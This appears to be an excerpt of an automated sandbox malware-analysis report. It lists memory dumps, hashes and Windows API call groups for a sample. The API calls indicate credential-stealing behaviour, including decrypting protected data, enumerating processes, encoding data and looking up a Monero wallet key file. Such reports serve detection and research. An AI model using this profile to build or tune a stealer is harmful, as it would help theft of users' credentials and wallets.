                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 'Iw_$'sz~$B Sw$g3Wu$v}v$v]
                  • API String ID: 0-3312680460
                  • Opcode ID: 8c38cd9cd0d70d8db6d10f0a3aa0b1eedce6c938c81ce0a1db8a46996638659b
                  • Instruction ID: 6eb7c833ad7ae6f8020dc5ede085c88c53de4c47027a7aa3226181a08e7259b8
                  • Opcode Fuzzy Hash: 8c38cd9cd0d70d8db6d10f0a3aa0b1eedce6c938c81ce0a1db8a46996638659b
                  • Instruction Fuzzy Hash: 4CA215F360C2049FE7146E2DEC8567ABBE9EF94320F16493DEAC4C3744E63598058697
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: /L{$ne?{$w'7$)No$s
                  • API String ID: 0-1082953227
                  • Opcode ID: f42597e84389864390c9c08e8535d442553f1e78964bacec61622521bf9c772b
                  • Instruction ID: 076d2fc68f14368f002beaa467bcde748ae2cda805c199ad5fac3b1cc073188b
                  • Opcode Fuzzy Hash: f42597e84389864390c9c08e8535d442553f1e78964bacec61622521bf9c772b
                  • Instruction Fuzzy Hash: A3B206F390C2109FE704AE29EC8567AFBE9EF94320F1A492DEAC4D3744E67558408797
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: "4'w$.`O$A:>$[D:G$~ ;
                  • API String ID: 0-3101290174
                  • Opcode ID: d2fb12ddc2017f380df36c8c5a741543b6a246766cc77f79dda07c4b0e78e712
                  • Instruction ID: 4753fa9539d78091161055657917b79337747c8a000bacaccf7c0a30ae227796
                  • Opcode Fuzzy Hash: d2fb12ddc2017f380df36c8c5a741543b6a246766cc77f79dda07c4b0e78e712
                  • Instruction Fuzzy Hash: 4EB208F3A0C2009FE7046E2DEC8567ABBE9EFD4720F1A853DE6C4C3744EA7558058696
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: *y4/$2VZo$5"]$<GH$j_
                  • API String ID: 0-2202854211
                  • Opcode ID: c6f789fc90887ee6113bfc54471651ce5f724bf11022e10667dad6683bd1220a
                  • Instruction ID: 138aa278eb925238298d4ba6d1c7fa3ee934176689ce291cf4f5bfc1cff690ca
                  • Opcode Fuzzy Hash: c6f789fc90887ee6113bfc54471651ce5f724bf11022e10667dad6683bd1220a
                  • Instruction Fuzzy Hash: 6FB2D5F350C200AFE7086F29EC8567AFBE9EF94720F1A892DE6C5C3744E63558418697
                  APIs
                  • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00FBC871
                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00FBC87C
                  • lstrcat.KERNEL32(?,00FD0B46), ref: 00FBC943
                  • lstrcat.KERNEL32(?,00FD0B47), ref: 00FBC957
                  • lstrcat.KERNEL32(?,00FD0B4E), ref: 00FBC978
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$BinaryCryptStringlstrlen
                  • String ID:
                  • API String ID: 189259977-0
                  • Opcode ID: 141bb33ac321d38ba1a2a83e17d1898d954432b4e6bbaf55c5aa4bc00002fa4e
                  • Instruction ID: c35882e1f817dd2ca9e385b1d02e7993c27076ae530bf6b63cd1e5d18a965464
                  • Opcode Fuzzy Hash: 141bb33ac321d38ba1a2a83e17d1898d954432b4e6bbaf55c5aa4bc00002fa4e
                  • Instruction Fuzzy Hash: DF416075D0421ADBDB20CF90DD89BEEBBB8AF88304F1041B9E509A7280D7749A84DF91
                  APIs
                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00FB724D
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FB7254
                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00FB7281
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00FB72A4
                  • LocalFree.KERNEL32(?), ref: 00FB72AE
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                  • String ID:
                  • API String ID: 2609814428-0
                  • Opcode ID: 71e09781061a4e346e8456f0d44ed4e74e3402459b9def2b70cf9c12c13d6176
                  • Instruction ID: e7c542d191b2898de9605e982c11592a1c691215e9eb307f2e048b10f19fe62b
                  • Opcode Fuzzy Hash: 71e09781061a4e346e8456f0d44ed4e74e3402459b9def2b70cf9c12c13d6176
                  • Instruction Fuzzy Hash: 65015275A40308BBDB24DFE4DD45F9D7778EF44701F104159FB19AB2C4DAB4AA408B64
                  APIs
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00FC961E
                  • Process32First.KERNEL32(00FD0ACA,00000128), ref: 00FC9632
                  • Process32Next.KERNEL32(00FD0ACA,00000128), ref: 00FC9647
                  • StrCmpCA.SHLWAPI(?,00000000), ref: 00FC965C
                  • CloseHandle.KERNEL32(00FD0ACA), ref: 00FC967A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                  • String ID:
                  • API String ID: 420147892-0
                  • Opcode ID: 7f44269e10ed3b0ab940505b458dbd5ba855465d623b0d847ff951e60ced9ca6
                  • Instruction ID: 2a1b4fdfe3a22b0fea30344e43cef9773ff42b57406fa0802fea41eaaec0a435
                  • Opcode Fuzzy Hash: 7f44269e10ed3b0ab940505b458dbd5ba855465d623b0d847ff951e60ced9ca6
                  • Instruction Fuzzy Hash: F6014C75A00208EBCB24DFA5D959FEDB7F8EF48311F00419CA90A97280D7B4AB80EF50
                  APIs
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00FD05B7), ref: 00FC86CA
                  • Process32First.KERNEL32(?,00000128), ref: 00FC86DE
                  • Process32Next.KERNEL32(?,00000128), ref: 00FC86F3
                    • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00C89158,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                    • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                    • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                    • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                  • CloseHandle.KERNEL32(?), ref: 00FC8761
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                  • String ID:
                  • API String ID: 1066202413-0
                  • Opcode ID: 7c6c3a031851d35ee35f95768aeaabf4e3bac273284f4a17499cc39357bb0efd
                  • Instruction ID: 5e5781529e2dbe2cdce7b9a13b4980cf18417f2c148f965ff3ebe1465273fbeb
                  • Opcode Fuzzy Hash: 7c6c3a031851d35ee35f95768aeaabf4e3bac273284f4a17499cc39357bb0efd
                  • Instruction Fuzzy Hash: 3E315971901219ABCB24DB50DE46FEEB778EF44704F1041ADA50AA2190EF386E45DFA1
                  APIs
                  • CryptBinaryToStringA.CRYPT32(00000000,00FB5184,40000001,00000000,00000000,?,00FB5184), ref: 00FC8EC0
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: BinaryCryptString
                  • String ID:
                  • API String ID: 80407269-0
                  • Opcode ID: bc43851ab988e762f10f4ec06be2c4f45724654ab06eed911bc0ad8938c6edc4
                  • Instruction ID: 46bec3d33c7fe7e9c271538e0cf902a72a98bcb639d198b252cb859ac849db4a
                  • Opcode Fuzzy Hash: bc43851ab988e762f10f4ec06be2c4f45724654ab06eed911bc0ad8938c6edc4
                  • Instruction Fuzzy Hash: 08111C71200206BFDB04CFA4E996FA737A9AF89755F10945CF919CB240DB75EC82EB60
                  APIs
                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00FB4EEE,00000000,00000000), ref: 00FB9AEF
                  • LocalAlloc.KERNEL32(00000040,?,?,?,00FB4EEE,00000000,?), ref: 00FB9B01
                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00FB4EEE,00000000,00000000), ref: 00FB9B2A
                  • LocalFree.KERNEL32(?,?,?,?,00FB4EEE,00000000,?), ref: 00FB9B3F
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: BinaryCryptLocalString$AllocFree
                  • String ID:
                  • API String ID: 4291131564-0
                  • Opcode ID: 944177e60116a878dbdee1fb2e4cb638177bd0972e9663fbf71992ede0d5eb4b
                  • Instruction ID: 82f8e0466e02146078c0a395dc1ffbff9bc7ee27db2dd1231eed1e5fb243fe1b
                  • Opcode Fuzzy Hash: 944177e60116a878dbdee1fb2e4cb638177bd0972e9663fbf71992ede0d5eb4b
                  • Instruction Fuzzy Hash: 5411D4B4640308AFEB14CF64D895FAA77B5FB89711F208058FA199B384C7B5AA41DB50
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00FD0E00,00000000,?), ref: 00FC79B0
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FC79B7
                  • GetLocalTime.KERNEL32(?,?,?,?,?,00FD0E00,00000000,?), ref: 00FC79C4
                  • wsprintfA.USER32 ref: 00FC79F3
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                  • String ID:
                  • API String ID: 377395780-0
                  • Opcode ID: 9edfeadedf7116bbb71736a5ec7140ddbb1ba25c7b5ceca93f5c8c42119600b6
                  • Instruction ID: abb2522baa352b03ee18435a3ddb9ff8751aee81601f36bf2160db9f20d04bbc
                  • Opcode Fuzzy Hash: 9edfeadedf7116bbb71736a5ec7140ddbb1ba25c7b5ceca93f5c8c42119600b6
                  • Instruction Fuzzy Hash: 5F1118B2904118ABCB149FC9E945BBEB7F8FB48B12F10411EF615A2284E27D5940DBB0
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00C8DEE8,00000000,?,00FD0E10,00000000,?,00000000,00000000), ref: 00FC7A63
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FC7A6A
                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00C8DEE8,00000000,?,00FD0E10,00000000,?,00000000,00000000,?), ref: 00FC7A7D
                  • wsprintfA.USER32 ref: 00FC7AB7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                  • String ID:
                  • API String ID: 3317088062-0
                  • Opcode ID: 847390a7aaf17ea5a6bef17092cadc7def10044efae10b7620163568e96266b4
                  • Instruction ID: 1d26a461e3dad02a6200a9d6a5d330df98c7769959729deab5526af30c5972da
                  • Opcode Fuzzy Hash: 847390a7aaf17ea5a6bef17092cadc7def10044efae10b7620163568e96266b4
                  • Instruction Fuzzy Hash: 4F11CEB1905218EBEB209B54DD4AFA9B778FB40721F0003AAE91A932C0D7785E80CF51
                  APIs
                  • CoCreateInstance.COMBASE(00FCE118,00000000,00000001,00FCE108,00000000), ref: 00FC3758
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00FC37B0
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
